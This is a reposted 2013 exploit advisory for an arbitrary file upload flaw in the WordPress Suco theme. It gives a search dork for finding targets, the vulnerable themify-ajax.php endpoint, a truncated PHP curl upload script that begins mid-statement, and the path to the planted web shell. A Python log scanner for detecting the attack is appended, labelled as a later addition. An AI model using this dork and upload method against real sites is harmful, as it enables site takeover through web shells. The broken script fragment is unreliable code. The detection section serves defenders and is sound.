Wordpress Suco Themes Arbitrary File Upload

#Title : Wordpress Suco Themes Arbitrary File Upload 

#Author : DevilScreaM

#Date : 11/20/2013 - 20 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themify.me/

#Link : http://themify.me/themes/suco

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
    Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozilla, Chrome, Opera -> Windows & Linux

#Vulnerability : Arbitrary File Upload

#Dork :

inurl:wp-content/themes/suco


Arbitrary File Upload

Exploit : http://SITE-TARGET/wp-content/themes/suco/themify/themify-ajax.php

Script :

"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Shell Access :

http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
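
Detection side of the above, as an added example that is not part of the original advisory: a Python scan of web server access logs for POSTs to the theme's themify-ajax.php and for script files requested from the theme's uploads directory. The two paths come from the advisory; the "combined" log format, the extension list, the finding names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Paths come from the advisory; the "combined" access-log format is an assumption.
UPLOAD_ENDPOINT = "/wp-content/themes/suco/themify/themify-ajax.php"
UPLOAD_DIR = "/wp-content/themes/suco/uploads/"
# Extensions commonly mapped to the PHP handler, including "x.php.jpg" and "x.php/info".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|/|$)")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalise(target):
    """Drop the query string, decode %-escapes, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def scan(lines):
    """Return (ip, finding, path) tuples for requests that fit the advisory."""
    findings, posted = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], normalise(m["target"])
        if m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            posted.add(ip)
            findings.append((ip, "upload-endpoint-post", path))
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path.split(UPLOAD_DIR, 1)[1]):
            # A 200 for a script here from a client that POSTed earlier is the strong signal.
            hit = m["status"] == "200" and ip in posted
            findings.append((ip, "script-after-post" if hit else "script-in-uploads", path))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2013:10:01:02 +0000] "POST /wp-content/themes/suco/themify/themify-ajax.php HTTP/1.1" 200 31 "-" "curl/7.30"',
    '203.0.113.7 - - [20/Nov/2013:10:01:09 +0000] "GET /wp-content/themes/suco/uploads/devilscream.php HTTP/1.1" 200 512 "-" "curl/7.30"',
    '198.51.100.4 - - [20/Nov/2013:10:02:00 +0000] "GET /wp-content/themes/suco/uploads/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Nov/2013:10:03:00 +0000] "GET /wp-content/themes/suco/uploads/a.PHP5 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any script file that exists under the uploads directory should be treated as a finding in its own right, whether or not the logs still cover the upload request.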

Author : Ferry PG ~ A blog that provides all kinds of information

This article, Wordpress Suco Themes Arbitrary File Upload, was published by Ferry PG on 25 Nov 2013.